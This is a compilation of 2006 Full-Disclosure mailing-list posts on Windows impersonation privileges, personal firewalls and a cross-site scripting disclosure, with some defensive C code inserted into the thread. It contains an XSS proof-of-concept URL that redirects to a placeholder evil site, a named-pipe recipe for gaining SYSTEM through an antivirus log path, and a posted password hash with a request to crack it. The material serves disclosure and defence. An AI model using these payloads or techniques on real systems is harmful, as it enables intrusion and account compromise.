[Full-disclosure] Hash Type?
Can someone please tell me if these are DES hashes, or if they could be Oracle hashes? I cannot get JTR to crack them, which leads me to believe they may not be DES. Any help please?

Username: UCN016
Password Hash: 8F789BA55BA187380BA1

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question for the Windows pros
Hello,

The ImpersonateNamedPipeClient() risks have been fully documented by Blake Watts back in 2002.
http://www.blakewatts.com/namedpipepaper.html

The problem is basically that OpenFile() will accept either:
- A file path (C:\toto.txt)
- A share path (\\hacker\toto)
- A named pipe path (\\hacker\pipe\toto)

(Did you ever notice that you cannot create a share named pipe on a Windows system? ;)

So if you can open a file with a privileged application (such as a SYSTEM service), you can gain the privileges of the application.

Real life example: take your antivirus, change the log file name from C:\Program Files\Antivirus\log.txt to \\mycomputer\pipe\toto while running a listener on the toto pipe. When the antivirus opens the log file, you become SYSTEM.

Regards,
- Nicolas RUFF
Security Researcher @ EADS-CRC
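A defensive check for the log-path case described in the message above, added here as an example (it is not from the original post or from the paper it cites): a privileged service classifies a configured path before opening it and accepts only a plain drive-letter path. The names `classify_path`, `is_safe_log_path` and the `path_kind` enum are assumptions for illustration, and the sample paths in `main` are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical classifier (not a Windows API): decides what kind of object
 * a configured file name would make a privileged process open. */
typedef enum {
    PATH_LOCAL_DRIVE,  /* C:\dir\file                              */
    PATH_UNC_SHARE,    /* \\host\share\file                        */
    PATH_NAMED_PIPE,   /* \\host\pipe\name or \\.\pipe\name        */
    PATH_DEVICE,       /* any other \\.\ or \\?\ path (rejected)   */
    PATH_OTHER         /* relative, drive-relative, empty, broken  */
} path_kind;

/* Win32 accepts both separators in ordinary paths, so treat them alike. */
static int is_sep(char c) { return c == '\\' || c == '/'; }

/* Case-insensitive comparison of the component [s, s+n) with a literal. */
static int comp_eq(const char *s, size_t n, const char *lit)
{
    size_t i;
    if (strlen(lit) != n) return 0;
    for (i = 0; i < n; i++)
        if (tolower((unsigned char)s[i]) != tolower((unsigned char)lit[i]))
            return 0;
    return 1;
}

/* Skip separators, return the start of the next component and its length. */
static const char *next_comp(const char *p, size_t *len)
{
    const char *e;
    while (is_sep(*p)) p++;
    e = p;
    while (*e && !is_sep(*e)) e++;
    *len = (size_t)(e - p);
    return p;
}

/* p points just past the UNC prefix: expect host, then share or "pipe". */
static path_kind classify_unc(const char *p)
{
    size_t hlen, slen;
    const char *host = next_comp(p, &hlen);
    const char *share = next_comp(host + hlen, &slen);
    if (hlen == 0 || slen == 0) return PATH_OTHER;
    return comp_eq(share, slen, "pipe") ? PATH_NAMED_PIPE : PATH_UNC_SHARE;
}

path_kind classify_path(const char *path)
{
    const char *first, *second;
    size_t flen, slen;

    if (path == NULL || path[0] == '\0') return PATH_OTHER;

    /* Drive letter, colon, separator: an absolute local path. */
    if (isalpha((unsigned char)path[0]) && path[1] == ':' && is_sep(path[2]))
        return PATH_LOCAL_DRIVE;

    /* Everything else of interest starts with two separators. */
    if (!(is_sep(path[0]) && is_sep(path[1]))) return PATH_OTHER;

    first = next_comp(path + 2, &flen);
    if (comp_eq(first, flen, ".") || comp_eq(first, flen, "?")) {
        second = next_comp(first + flen, &slen);
        if (comp_eq(second, slen, "pipe")) return PATH_NAMED_PIPE;
        if (comp_eq(second, slen, "UNC")) return classify_unc(second + slen);
        /* Conservative: \\?\C:\x is a real file, but it is refused too. */
        return PATH_DEVICE;
    }
    return classify_unc(path + 2);
}

/* Allowlist: a privileged service opens only plain drive-letter paths. */
int is_safe_log_path(const char *path)
{
    return classify_path(path) == PATH_LOCAL_DRIVE;
}

int main(void)
{
    /* Constructed sample values, modelled on the paths in the message. */
    const char *samples[] = {
        "C:\\Program Files\\Antivirus\\log.txt",
        "\\\\mycomputer\\pipe\\toto",
        "\\\\hacker\\toto",
        "//hacker/PIPE/toto",
        "\\\\?\\UNC\\hacker\\pipe\\toto",
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-40s kind=%d safe=%d\n", samples[i],
               (int)classify_path(samples[i]), is_safe_log_path(samples[i]));
    return 0;
}
```

On Windows, a service that cannot avoid opening caller-influenced paths can also pass `SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION` in the flags argument of `CreateFile`, which limits a pipe server on the other end to an identification-level token.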
Re: [Full-disclosure] overflow protection software ?
anybody know some software like stackdefender which do the overflow protection ?

Hello,

From the PaX homepage:
- BufferShield http://www.sys-manage.com/index10.htm

You might also be interested in those products, which are not using the same technologies, but aiming at the same goal:
- Wehntrust http://www.wehnus.com/products.pl
- Ozone http://www.securityarchitects.com/
- Cisco Secure Agent (stack walking and more) http://www.cisco.com/en/US/products/sw/secursw/ps5057/
- McAfee Entercept (idem) http://www.mcafee.com/us/products/mcafee/host_ips/standard_edition.htm
- SkyRecon StormShield http://www.skyrecon.com/products.html

And many more I suppose ...

Regards,
- Nicolas RUFF
Security Researcher @ EADS-CRC
[Full-disclosure] MBT Xss vulnerability
Hii List;

Recently, I found an Xss vulnerability in MBT web site. MBT offers services from Consulting to Managed Services. It is the Corporate member of The International Systems Security Engineering Association (ISSEA). BS 7799 (Information Security Management Framework) certified organization

Vulnerability: MBT XSS (Cross Site Scripting) Attacks
Criticality: Medium
Description: MBT (http://www.mahindrabt.com/website/index.htm ) is a leading India-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business critical applications, MBT enables its clients, protect their investment in legacy systems, enhance capital budgets, reduce operating expenses and build solutions for the multi-services future. However it suffers Xss vulnerability on its own web page.

Below is the proof-of-concept which explains this - http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]

Re-directing the site to any malicious or fake site to trap the victim : http://www.mahindrabt.com/jse/jsp/search.jsp?q= scriptdocument.location='http://www.[evil.site].com'/script

Though it does not affect server side a lot and may seem harmless, but it can be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit the malicious weblink under the pretext of some job positions being vacant.

Vendor notification: Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond.

Regards;
Santosh J.
Re: [Full-disclosure] MBT Xss vulnerability
What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT? Your post is yet another proof that FD is more and more inhibited by script kiddies. Get a life!

On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:

Hii List;

Recently, I found an Xss vulnerability in MBT web site. MBT offers services from Consulting to Managed Services. It is the Corporate member of The International Systems Security Engineering Association (ISSEA). BS 7799 (Information Security Management Framework) certified organization

Vulnerability: MBT XSS (Cross Site Scripting) Attacks
Criticality: Medium
Description: MBT ( http://www.mahindrabt.com/website/index.htm ) is a leading India-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business critical applications, MBT enables its clients, protect their investment in legacy systems, enhance capital budgets, reduce operating expenses and build solutions for the multi-services future. However it suffers Xss vulnerability on its own web page.

Below is the proof-of-concept which explains this - http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]

Re-directing the site to any malicious or fake site to trap the victim : http://www.mahindrabt.com/jse/jsp/search.jsp?q= scriptdocument.location='http://www.[evil.site].com'/script

Though it does not affect server side a lot and may seem harmless, but it can be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit the malicious weblink under the pretext of some job positions being vacant.

Vendor notification: Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond.

Regards;
Santosh J.
[Full-disclosure] Re: PC Firewall Choices
Nic Werner wrote in news:[EMAIL PROTECTED] On 1/17/06, Greg [EMAIL PROTECTED] wrote: -Original Message- From: full-disclosure-bounces@ On Behalf Of Nic Werner Sent: Wednesday, 18 January 2006 10:05 AM ZoneAlarm - gets in the way, and hard to diagnose problems. You end up turning it off because it never remembers your settings and you can't trust it. Rubbish. Sure it gets in the way. It is MEANT to get in the way. If you close it down, it is likely because you don't know how to drive it. The prog CAN be a little hard to newbies to understand if you want to go internet banking etc but people on this list ought to know how to handle it. Getting in your way as opposed to letting you get work done are two different things. Kerio does a great job of popping up and explaining what is happening while I've seen more people confused by ZA and its dialogs No, we've turned ZA off as web sites or programs won't load (Ciscoworks, nGenius, etc) and even though we've checked the logs of ZA, nothing shows as being blocked. Turn it off and everything magically works. I will never run the bloat that is ZA. I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. So I'm convinced the problem exists between chair and keyboard. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? 
Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise than Uh I dunno it just went wrong. cheers, DaveK [*] which I consider to be the gold standard for lousy, bloated, buggy, faulty software. -- Can't think of a witty .sigline today
[Full-disclosure] Re: Re: Security Bug in MSVC
Jason Coombs wrote in news:[EMAIL PROTECTED] Dave Korn wrote: Nice thinking, Donnie. This must be the new class of vulnerability that was hinted at by Microserfs a few months ago... The attacks are launched by way of source code distributions rather than binary code. Why is this a terrible insecure microsoftism, when GNU make does exactly the same? Just after Donnie reported this issue to Microsoft (September) we started seeing Microserfs suggest that their security team was working on a never-before-encountered novel class of vulnerability, And for some reason you assume that this was the often-before-encountered and non-novel vulnerability that you had just reported, rather than any of the presumably million-and-one vulnerabilities of varying levels of seriousness or insignificance that they are routinely having reported and dealing with? -- since it would be politically valuable for Microsoft to be able to claim that sharing source code is an unsafe behavior, and since there have been no other vulnerabilities disclosed since that time which might have appeared to Microsoft to be entirely new and far-reaching, I suspect that this disclosure prompted those previous statements about work being done by Microsoft. Well, that's a massive assumption. For a start, there's nothing new about it - remember the trojaned configure scripts? For a continuance, maybe they're just still working on this whatever-it-is? and the implication was that Microsoft's security competency had finally surpassed both the black hats and all other white hat groups Heh. Any possible reputation M$ might have been hoping to acquire for security competency has been *utterly* blown out of the water by the WMF bug. After all, they had this big refocusing, after slammer, and audited all their code and started putting security first and foremost, remember? Heh, yeh, sure they did.
It's a stunning indictment of the worth of M$'s code audit that they had this accept-a-pointer-to-code-from-a-file design flaw right out there in the open beneath their noses and they didn't even see what was in front of them. Presumably the rest of their audit can be assumed to have been equally thorough! How many other attacks can you point to where Microsoft's development tools are exploited to specifically target the unwary programmer who still thinks it's perfectly safe to download arbitrary data from an untrusted source and then open it in a text editor? Umm, perhaps if you think that Dev Studio is a text editor, that would explain your misunderstandings. My question to you is, what kind of programmer doesn't know that building code involves running all sorts of arbitrary executables with arbitrary data? And in any case, opening the data in dev studio *is* entirely safe. The batch commands aren't executed unless you choose the relevant menu commands or f-key to build the project. Of course, you know perfectly well that it's safe to simply _open_ the file, and you know perfectly well that DevStudio is FAR more than a text editor, so I must assume the above paragraph to have been dishonest rhetoric/polemic rather than a serious line of argument. My guess is that Donnie got Microsoft thinking about this very risk, and they started talking internally about it being an entirely new class of vulnerability. Yes, if my supposition is correct it would be quite pathetic and give us another reason to laugh at Microsoft; but you can probably see how much benefit Microsoft is going to be able to milk out of this and related attacks that exploit bugs in programmers' tools that are launched by the simple act of opening or attempting to compile a source code distribution. Well, you can't run *anything* with arbitrary data and expect to be safe. Except, of course, a plain, no-features-no-frills ASCII text editor. Source code is just as dangerous as binary code. Absolutely. 
Clearly, the only way to be safe is to rely on Microsoft's programmers to create and digitally-sign software for us. Go Microsoft. Yeah! Well, I suppose it's conceivable that M$ are attempting a massive FUD over nothing, but I think they'd want at least a *bit* more substance to back up the pure hype... cheers, DaveK -- Can't think of a witty .sigline today
[Full-disclosure] Re: Question for the Windows pros
Paul Schmehl wrote in news:[EMAIL PROTECTED] This is incorrect. The privilege exists *and* functions on the Workstation operating systems Win2000 SP4 *and* WinXP. I have verified this through testing. Yes, there's nothing new about impersonation, it's been there all the way back to NT. I've already been there and read the page - several times. I understand *in general* what an impersonation privilege is. I need to know *specifically* what server's clients can be impersonated when this privilege is applied to an account. So far, I've found nothing on the web that even attempts to address that issue. Unfortunately, it has not. Again, I understand *in general* what impersonation is, how it works and what it can mean in terms of security. I am looking *specifically* for what a user who has the privilege Impersonate a client after authentication has the right to do. Does it mean that *anything* that user runs runs under his/her privileges? Does it mean only *local* processes are affected? Does it mean a hacker can access the machine remotely and run under the user's privileges? IOW, if I have a domain account name Joe, and I grant Joe this privilege, what is placed at risk? The local machine he's logged in to? The entire domain? Only certain services? Saying it's a high risk (like ISS does) and then not defining *precisely* what the risks are is not helpful. And all I was really asking for is pointers to any white papers or conference presentations that even attempt to illuminate this issue. It's looking like there are none. The info is out there, but it's scattered across a combination of MSDN, WDJ, OSR and similar sources. I started writing a full explanation yesterday when you posted this. I'll try and finish it off when I get home from work this evening. cheers, DaveK -- Can't think of a witty .sigline today
[Full-disclosure] Re: Question for the Windows pros
Paul Schmehl wrote in news:[EMAIL PROTECTED] Oh, alright, just one more, then I'll leave it until I've finished my essay. The spyware has to bring the credentials with it. The user doesn't *have* the credentials. It *gets* them from the process in question. That's a bit different. The user has the right to impersonate within the context of a process. The process must already have the credentials to elevate, or the user gets nothing (if I'm understanding impersonation correctly.) You aren't, sorry! This is in fact almost exactly back-to-front: the user *does* have credentials, and processes inherit their credentials from the user who launches the process. cheers, DaveK -- Can't think of a witty .sigline today
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Interesting, How is it that I start a thread on penetration testing tools... and it evolves to Trademark -Adriel -Original Message- From: Yvan Boily [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tue, 17 Jan 2006 23:12:09 -0600 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools The adwords/trademark issue on Google has seen its day in court. Kind of interesting: http://www.google.ca/search?hl=enq=google+geico+lawsuitmeta= On 1/17/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: I think its up for debate. Business and ethics aren't one in the same. -Original Message- From: Gadi Evron [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 02:20:31 +0200 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/ rant When I viewed the online demo of SAINT Exploit in December of 2005, nearly all of their exploit modules had names very similar to the ones found in version 2.5 of the Metasploit Framework. The demo has been updated since then and a handful of new exploits have been mixed in while others had their name changed. Oh, and their placement of a Google Adword on metasploit was a nice touch... /rant Speaking of Google.. I had the unfortunate fortune of working on an ad campaign recently. It brought to the fore many questions.. some of them were about this. If I put an adword on symantec, don't I breach their trademark, or Google does? I doubt anyone would sue Google to find out, or be in courts for so long it won't matter any longer. Annoying, but works both ways. Gadi. -- ygjb Computer Science is no more about computers than astronomy is about telescopes. E. W. Dijkstra
Re: [Full-disclosure] Startup company
Well, Having run my own business for many years I can tell you that you need an education in business. If not, you will get your education with the first attempt at running your own, but you will fail. Running a business is much more than simply understanding technology. You also need to understand the market, the clients wants and sometimes the clients needs. Often times needs and wants are not in line. Anyway... I could talk and talk on this... take some business courses. -Adriel -Original Message- From: Yvan Boily [EMAIL PROTECTED] To: Shyaam [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Tue, 17 Jan 2006 23:13:48 -0600 Subject: Re: [Full-disclosure] Startup company Good luck! Hope 'your friend' has a lot of RD dollars set aside! On 1/17/06, Shyaam [EMAIL PROTECTED] wrote: Hello All, My friend is starting a new company for providing Anti-reversing security and related to forensics. Can someone give some tips and guidance. Thank you Shyaam -- ygjb Computer Science is no more about computers than astronomy is about telescopes. E. W. Dijkstra
Re: [Full-disclosure] PC Firewall Choices
Bullguard is like that too... not sure how it compares to Kaspersky, but it is pretty neat IMHO. -Adriel -Original Message- From: Nancy Kramer [EMAIL PROTECTED] To: Steven [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 04:22:52 -0500 Subject: Re: [Full-disclosure] PC Firewall Choices I have limited experience with PC Firewalls but the nicest one I have seen is the one that comes with Kaspersky anti virus. It appeared to be very easy to configure and never seems to cause problems with legitimate applications accessing the web. I do know that it does not meet your requirements since it comes bundled with anti virus, although if I remember correctly one could pick which of their bundled components to install at install time. Regards, Nancy Kramer At 03:22 PM 1/17/2006, Steven wrote: I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a third party product on a bunch of Windows machines. I am trying to determine what product to go with and wanted to solicit some opinions from this mailing list. The four that I really come across and have used in some cases are ZoneAlarm, Sygate, Norton, Kerio, and Tiny. My understanding is that Norton has actually acquired Sygate and that the Sygate Personal Firewall probably wouldn't be the best choice of these now. With that in mind I am looking for a product that easy to setup, easy to use, works well, and does not take up too much in terms of system resources or harddrive space ( I also don't want it to add 20 minutes to the boot process either). I am not looking for e-mail protection, antivirus, or any other non-firewall type services to be included. I do however want it to be able to manage applications and their internet usage. (i.e. if they install something new that tries to access the web (trojans included) they will get a popup telling them something is doing this). Any suggestions and opinions on the above products and any others that I might not have mentioned are welcomed. Also -- on top of this if someone knows of software/hardware that can scan these machines and verify whether or not both the SP2 FW and/or the 3rd party FW -- and perhaps prevent them network access if they are not running -- please let me know. [I am not sure what security products have these capabilities] Thanks Steven
[Full-disclosure] Re: Question for the Windows pros
Paul Schmehl wrote in news:[EMAIL PROTECTED] This is how I understand the process: 1) Joe, who is a User, launches the custom installer (through a login script) 2) The install process begins running under Joe's credentials (User) 3) At some point in the install process, elevated privileges are required to continue 4) Joe doesn't have them, but he has the Impersonate privilege. 5) Joe's process requests the credentials embedded in the custom installer No. They aren't embedded in the installer. They are the credentials belonging to another process, to which the impersonator is connected, via a pipe or LPC port, that the impersonator holds the server end of. 6) Joe's process uses those credentials to complete the install, then relinquishes them This means that the exposure, when granting the privilege, is as follows: 1) If you can launch a process on the local machine AND 2) The process has embedded credentials that are different from the user launching the process THEN 3) The user gains those credentials' privileges ***for the length of that process*** It is indeed the case that a process that is impersonating cannot pass on the impersonated credentials to a child process. However, credentials are not embedded in processes, or in executables; ultimately, they come from the SAM or AD. From a hacker standpoint, this means that you would already need elevated privileges in order to take advantage of the user's right to impersonate. This is a fairly low risk. So, why did M$ decide to remove this right from the user? Because it prevents them from installing software on the box. It could in theory be abused to escalate privileges. OK, shoot holes in my theory. As I said in another post in this thread, I'm writing a fuller explanation that I'll post later when I get time to finish it up. cheers, DaveK -- Can't think of a witty .sigline today
Re: [Full-disclosure] Re: PC Firewall Choices
On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. Really? Do you just run notepad? I've had to remove it on several machines because it blocked the launch of certain applications despite there being no rules to do so. This includes (to my recollection this was some months ago) some popular tax software updating features, adobe acrobat plugin stopped working within IE even though it was configured to, and numerous other problems that couldn't be tracked to any rules. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when ZA is installed web browsing with IE is slowed down very noticeably, far more than average Norton System Works install causes. Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. Neither does anyone else in this thread, you just presume we're all lusers who can't read English or configure simple software. So I'm convinced the problem exists between chair and keyboard. Your wild assumptions that because you've never had a problem that anyone who does must be an idiot is astounding...do you teach? Try using google you'll find thousands of ZA problems, not all imagined. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? Having uninstalled it, deleted the executable, and wiped my free space. No.
Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim It's clearly the problem if it degrades system performance, some apps fail to load, and all this goes away when is disabled. And who the hell takes notes on every piece of software they install and remove because its buggy? Please we'd all have a set of encyclopedia-sized notes for Windows problems alone. that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? It's easy to know, because when you uninstall it suddenly things are much smoother and your heart rates go back down. I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise than Uh I dunno it just went wrong. Just because someone doesn't take notes every time some piece of shit software doesn't work as advertised and uninstall it, doesn't make what they say any less true. Why would I install something just to prove it causes problems to satisfy the ego of someone who thinks because something works for them it must be perfect for everyone. It would be fruitless. If you can't find anyone reporting real problems with ZA then maybe you should browse your way over to www.google.com and do a search. cheers, DaveK [*] which I consider to be the gold standard for lousy, bloated, buggy, faulty software. -- Can't think of a witty .sigline today I have a sigline for you: ZA is in my mouth. Stop sucking. Why isn't it friday yet, -sb
Re: [Full-disclosure] Re: PC Firewall Choices
As cruel as that last message was I'm sick of the ZA pros here saying it's perfect, it's not, far from it. But I forgot to mention it beats Symantec's firewall hands down. Symantec Personal Firewall I've found from many different versions the same horrible inconsistencies in my experience installing it for a family member. For example: 1) In the 2004 iteration of NPF it would simply stop working at times. Basically it would just completely stop working and would prevent the launch of even trusted applications. The only solution was to reset and pray it didn't happen again soon. 2) Even though Opera was fully configured in the rules (tried manually and automatic scan option), it would only launch half the time. NPF would block it from launching despite its own rules. It did this selectively with different applications. Sometimes it was just Opera, other times IE or Firefox would not open either. Killing the firewall service would make this go away. The above alone was enough to drive you nuts. NPF acted the above way after several reinstalls and even the formatting of the drive and reinstallation of Windows had no effect on its buggy ways. 2005 edition was no better. The 1st problem mentioned above didn't seem to happen with 2005, but the second problem continued unabated. It's like NPF would just decide on its own it didn't like a particular app or rule. It is relatively easy to configure, though finding exactly what you're looking for in the settings can be a pain at times. Best Regards, sb On 1/19/06, Stan Bubrouski [EMAIL PROTECTED] wrote: On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. Really? Do you just run notepad? I've had to remove it on several machines because it blocked the launch of certain applications despite there being no rules to do so.
This includes (to my recollection this was some months ago) some popular tax software updating features, adobe acrobat plugin stoppped working within IE even though it was configured to, and numerous other problems that couldn't be tracked to any rules. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when ZA is installed web browsing with IE is slowed down very noticably, far more than average Norton System Works install causes. Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. Neither does anyone else in this thread, you just presume we're all lusers who can't read english or configure simple software. So I'm convinced the problem exists between chair and keyboard. Your wild assumptions that because you've never had a problem that anyone who does must be an idiot is astounding...do you teach? Try using google you'll found thousands of ZA problems, not all imagined. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? Having uninstalled it, deleted the executable, and wiped my free space. No. Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim It's clearly the problem if it degrades system performance, some apps fail to load, and all this goes away when is disabled. And who the hell takes notes on every piece of software they install and remove because its buggy? 
Please we'd all have a set of encyclopedia-sized notes for Windows problems alone. that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? It's easy to know, because when you uninstall it suddenly things are much smoother and your heart rates go back down. I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise then Uh I dunno it just went wrong. Just because someone doesn't take notes every time some piece of shit software doesn't work as advertised and uninstall it, doesn't make what they say any less true. Why would I install something just to prove it causes problems to satisfy the ego of someone who thinks because something works for them it must be perfect for everyone. It would be fruitless.
Re: [Full-disclosure] Re: PC Firewall Choices
On Thu, 19 Jan 2006 14:36:33 GMT, Dave Korn said:
> I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise than "Uh I dunno it just went wrong".

<troll>
I don't know. Computer software that continually just goes wrong rather than explaining the failure in terms the intended user can understand sounds... flawed. ;)
</troll>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question for the Windows pros
--On Thursday, January 19, 2006 08:20:37 +0100 Bernhard Mueller [EMAIL PROTECTED] wrote:

> Hello,
>
> The ImpersonateClient API does not require that credentials are embedded into the program. A call to ImpersonateClient allows a server to impersonate the client when it receives a local connection, e.g. via a named pipe. It is mostly used by servers to DROP their privileges to that of the connecting user if they are running with administrative privileges.
>
> A security issue with ImpersonateClient arises if there's no error checking on the ImpersonateClient call and the process runs without realizing that it is still SYSTEM. Another issue would be an unprivileged client with the ImpersonateClient privilege, if an attacker manages to make a process with admin rights connect to that client. This is why normal users do not have this right by default.

When you say "manages to make a process with admin rights connect", you are referring to the Local Administrator account on the machine in question, correct?

So far, from what I understand, granting this privilege to a User means that *if* a process with higher privileges can connect to the computer in question, the User's privileges will be elevated through impersonation. If this is the case, then the security risk is minimal, I would think.

I would welcome suggestions regarding scenarios where this could be used to exploit a box. ISTM if the connecting process already has the admin rights, elevating the User's rights through impersonation merely elevates the User to the same level of privilege that the process already has.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
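The first issue raised in the quoted explanation above (an impersonation call whose result is never checked, so the server carries on under its own account) is shown here as an added example that is not part of the original thread. `ImpersonateNamedPipeClient()` and `RevertToSelf()` are the real Win32 calls; `serve_unchecked()`, `serve_checked()`, `run_case()` and the non-Windows test double are hypothetical names constructed for this illustration.

```c
/* Added example: fail-closed handling of named-pipe impersonation. */
#include <stdio.h>

#ifdef _WIN32
#include <windows.h>
typedef HANDLE pipe_t;
/* Real Win32 calls; both return nonzero on success. */
static int impersonate_client(pipe_t p) { return ImpersonateNamedPipeClient(p) != 0; }
static int revert_to_self(void)         { return RevertToSelf() != 0; }
#else
/* Constructed test double so the control flow can be exercised off Windows. */
typedef int pipe_t;
static int sim_impersonate_ok = 1;  /* set to 0 to simulate a failed call */
static int sim_as_client = 0;       /* 1 while the thread holds the client's identity */
static int impersonate_client(pipe_t p) {
    (void)p;
    if (!sim_impersonate_ok) return 0;
    sim_as_client = 1;
    return 1;
}
static int revert_to_self(void) { sim_as_client = 0; return 1; }
#endif

enum serve_result { SERVED = 0, REFUSED = 1, REVERT_FAILED = 2 };
typedef void (*work_fn)(void *ctx);

/* The unchecked shape described in the thread: the return value is ignored,
 * so when impersonation fails, work() runs with the service's own token. */
static enum serve_result serve_unchecked(pipe_t pipe, work_fn work, void *ctx) {
    impersonate_client(pipe);
    work(ctx);
    revert_to_self();
    return SERVED;
}

/* Hardened shape: refuse the request unless the thread really is running
 * as the client, and report a failed revert so the caller can shut down
 * instead of continuing under the wrong identity. */
static enum serve_result serve_checked(pipe_t pipe, work_fn work, void *ctx) {
    if (!impersonate_client(pipe))
        return REFUSED;          /* fail closed: do no work on the client's behalf */
    work(ctx);
    if (!revert_to_self())
        return REVERT_FAILED;
    return SERVED;
}

#ifndef _WIN32
/* Records which identity each unit of work ran under (simulation only). */
struct audit { int as_client; int as_service; };

static void audited_work(void *ctx) {
    struct audit *a = ctx;
    if (sim_as_client) a->as_client++;
    else               a->as_service++;
}

/* Runs one request with impersonation forced to succeed or fail. */
static enum serve_result run_case(int checked, int impersonation_ok, struct audit *a) {
    a->as_client = 0;
    a->as_service = 0;
    sim_impersonate_ok = impersonation_ok;
    sim_as_client = 0;
    return checked ? serve_checked(0, audited_work, a)
                   : serve_unchecked(0, audited_work, a);
}
#endif

int main(void) {
#ifndef _WIN32
    struct audit a;
    enum serve_result r;

    r = run_case(0, 0, &a);
    printf("unchecked, impersonation fails: result=%d as_service=%d\n", r, a.as_service);
    r = run_case(1, 0, &a);
    printf("checked,   impersonation fails: result=%d as_service=%d\n", r, a.as_service);
    r = run_case(1, 1, &a);
    printf("checked,   impersonation ok:    result=%d as_client=%d\n", r, a.as_client);
#else
    puts("The simulation runs on non-Windows builds; use serve_checked() in the pipe server.");
#endif
    return 0;
}
```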
Re: [Full-disclosure] Question for the Windows pros
--On Thursday, January 19, 2006 10:32:44 +0100 Nicolas RUFF [EMAIL PROTECTED] wrote:

> The ImpersonateNamedPipeClient() risks have been fully documented by Blake Watts back in 2002.
> http://www.blakewatts.com/namedpipepaper.html

Does the "Impersonate a client after authentication" privilege grant the account access to ImpersonateNamedPipeClient?

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] Re: Question for the Windows pros
--On Thursday, January 19, 2006 15:01:49 + Dave Korn [EMAIL PROTECTED] wrote:

> As I said in another post in this thread, I'm writing a fuller explanation that I'll post later when I get time to finish it up.

I'll wait for your paper before asking any further questions. Thanks.

